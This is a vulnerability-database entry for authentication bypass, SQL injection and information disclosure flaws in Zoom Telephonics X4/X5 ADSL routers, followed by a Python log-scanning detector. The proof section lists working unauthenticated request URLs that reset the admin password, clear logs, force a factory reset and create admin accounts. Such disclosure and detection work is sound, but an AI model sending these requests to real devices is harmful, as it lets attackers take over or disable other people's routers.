Multiple Security Vulnerabilities in Multiple Zoom Telephonics Devices

Vulnerability ID: 1121747    Vulnerability type: Other
Published: 2013-07-09    Updated: 2013-09-03
CVE ID: CVE-2013-5620    CNNVD-ID: CNNVD-201307-225
Platform: Hardware    CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/38632
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-225
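|Vulnerability details
The X4 ADSL Modem and Router and the X5 ADSL Modem and 4-port Router are wireless modem/router products in the communications product line developed by Zoom Telephonics (USA). Multiple Zoom Telephonics devices contain an information disclosure vulnerability, authentication bypass vulnerabilities and an SQL injection vulnerability. An attacker can exploit these vulnerabilities to gain unauthorized access, perform arbitrary actions, obtain sensitive information, take control of the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The following products are affected: X4 ADSL Modem and Router, X5 ADSL Modem and 4-port Router.
|Exploit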
source: http://www.securityfocus.com/bid/61044/info

Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability.

Exploiting these issues could allow an attacker to gain unauthorized access and perform arbitrary actions, obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs

--Menu Banner
http://www.example.com/hag/pages/toc.htm

-Advanced Options Menu
http://www.example.com/hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser
URL, or a modified HTTP GET/POST request-

-Change Password for admin Account

On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

-Clear Logs
http://www.example.com/Action?id=76&cmdClear+Log=Clear+Log

-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http://www.example.com/Action?reboot_loc=1&id=5&cmdReboot=Reboot

-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes
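
Added example (not part of the original advisory or any vendor tooling): a log check that flags requests to the administrative endpoints listed above when they come from hosts outside a management allowlist. It assumes Common Log Format lines from a proxy or sensor in front of the device's web interface; the management host address and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# (label, endpoint pattern, parameter marking the state-changing request);
# endpoints and parameter names are the ones listed in the advisory.
RULES = [
    ("admin password change", r"/hag/emweb/PopOutUserModify\.htm", r"new_pass1="),
    ("account creation", r"/hag/emweb/PopOutUserAdd\.htm", r"pass1="),
    ("factory-reset reboot", r"/Action\b", r"cmdReboot="),
    ("log clear", r"/Action\b", r"cmdClear Log="),
    ("admin menu page", r"/hag/pages/(toc|toolbox)\.htm", r""),
]
# Assumed input: Common Log Format (client IP, request line, status).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(method, target):
    """Return a label for a request to one of the admin endpoints, else None."""
    # Decode first ("+" -> space, %xx -> char) and match on the whole target:
    # the firmware <= 2.5 password URL has no "?" before its parameters.
    decoded = unquote_plus(target)
    for label, endpoint, param in RULES:
        if re.search(endpoint, decoded, re.I) and re.search(param, decoded, re.I):
            return label
    # POST parameters travel in the body, which access logs do not record.
    if method.upper() == "POST" and any(re.search(e, decoded, re.I) for _, e, _ in RULES):
        return "POST to admin endpoint (body not logged)"
    return None

def scan(lines, mgmt_hosts=frozenset()):
    """Return (client, label, status) for admin requests from non-management hosts."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):  # skip unparseable lines
        client, method, target, status = m.groups()
        label = classify(method, target)
        if label and client not in mgmt_hosts:
            hits.append((client, label, int(status)))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jul/2013:10:00:09 +0000] "GET /hag/emweb/PopOutUserModify.htm/FormOne&user=admin&new_pass1=x&new_pass2=x HTTP/1.1" 200 312',
    '203.0.113.7 - - [09/Jul/2013:10:00:15 +0000] "GET /Action?id=76&cmdClear+Log=Clear+Log HTTP/1.1" 200 98',
    '192.168.1.10 - - [09/Jul/2013:10:05:00 +0000] "GET /Action?reboot_loc=1&id=5&cmdReboot=Reboot HTTP/1.1" 200 98',
    '198.51.100.4 - - [09/Jul/2013:10:06:00 +0000] "GET /index.htm HTTP/1.1" 200 900',
    '198.51.100.4 - - [09/Jul/2013:10:06:30 +0000] "POST /hag/emweb/PopOutUserAdd.htm HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, mgmt_hosts={"192.168.1.10"}))
```

A 200 status on any flagged line from an address outside the allowlist is the case to investigate first, since the advisory describes these endpoints as reachable without authentication.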
|References

Source: BID
Name: 61044
Link: http://www.securityfocus.com/bid/61044